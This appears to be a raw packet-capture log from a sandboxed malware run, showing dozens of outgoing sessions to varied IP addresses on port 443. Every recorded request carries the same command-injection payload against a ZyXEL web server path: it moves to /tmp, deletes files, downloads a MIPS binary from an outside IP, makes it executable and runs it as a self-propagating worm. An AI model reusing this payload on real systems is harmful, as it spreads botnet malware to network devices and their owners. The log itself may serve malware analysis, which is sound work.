                                        Jan 14, 2024 16:18:30.116908073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        463192.168.2.134210660.47.166.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.117012024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        464192.168.2.133996640.78.192.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.117099047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        465192.168.2.1336960192.35.201.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.117153883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        466192.168.2.135008878.14.96.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.117208004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        467192.168.2.1355170178.185.19.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.117292881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        468192.168.2.134912067.105.229.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.117343903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        469192.168.2.1350818196.39.172.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.117419004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        470192.168.2.1344320123.41.180.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.117466927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        471192.168.2.1358002147.43.55.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.117521048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        472192.168.2.133357084.204.159.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.117599964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        473192.168.2.135910039.226.4.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.117655993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        474192.168.2.1342382222.8.107.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.117722034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        475192.168.2.133683284.83.253.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.117775917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        476192.168.2.1342402139.152.157.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.117818117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        477192.168.2.1344220168.22.186.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.117899895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        478192.168.2.135054884.27.213.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.117955923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        479192.168.2.1354986110.100.160.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.118025064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        480192.168.2.134783041.193.255.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.118074894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        481192.168.2.1334716147.91.155.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.118141890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        482192.168.2.134616487.185.186.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.118187904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        483192.168.2.1345146167.54.210.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.118264914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        484192.168.2.1337672107.178.152.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.118330956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        485192.168.2.1353462137.82.179.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.118377924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        486192.168.2.1348276218.214.81.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.118432045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        487192.168.2.135493673.97.187.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.118483067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        488192.168.2.1354104141.71.63.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.118542910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        489192.168.2.1356686216.123.139.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.118592024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        490192.168.2.134084232.177.215.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.118704081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        491192.168.2.1356456145.139.154.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.118735075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        492192.168.2.1346128161.162.207.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.118803024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        493192.168.2.13523702.46.109.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.118880033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        494192.168.2.134245017.201.143.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.118937016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        495192.168.2.1357236156.75.113.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.119002104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        496192.168.2.1342014167.154.122.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.119034052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        497192.168.2.1335304220.0.71.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.119096041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        498192.168.2.1357152138.5.151.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.119177103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        499192.168.2.1335266114.211.201.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.119225025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        500192.168.2.1344950104.146.101.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.119268894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        501192.168.2.136052491.234.129.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.119321108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        502192.168.2.134216627.110.202.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.119379044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        503192.168.2.1349350132.175.57.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.119431019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        504192.168.2.133646263.82.5.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.119483948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        505192.168.2.135116227.150.69.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.119530916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        506192.168.2.135000295.206.73.176443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.119615078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        507192.168.2.1354598152.169.214.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.119673014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        508192.168.2.1351836156.131.132.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.119703054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        509192.168.2.13339882.163.43.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.119762897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        510192.168.2.1333258147.152.128.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.119817972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        511192.168.2.133998412.25.2.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.119890928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        512192.168.2.136063437.129.223.150443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.119947910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        513192.168.2.1338672217.185.22.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.120003939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        514192.168.2.1348400185.178.87.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.120069981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        515192.168.2.1339154203.207.7.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.120122910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        516192.168.2.1337278193.239.124.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.120182037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        517192.168.2.135917690.167.119.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.120249033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        518192.168.2.133414667.235.184.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.120281935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        519192.168.2.1357422165.51.58.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.120337009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        520192.168.2.133990462.234.42.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.120378971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        521192.168.2.1352764142.74.187.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.120424986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        522192.168.2.1337272196.141.167.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.120460987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        523192.168.2.1334976221.217.156.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.120553017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        524192.168.2.1360974144.3.231.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.120580912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        525192.168.2.1344248147.149.68.240443
                                        TimestampBytes transferredDirectionData
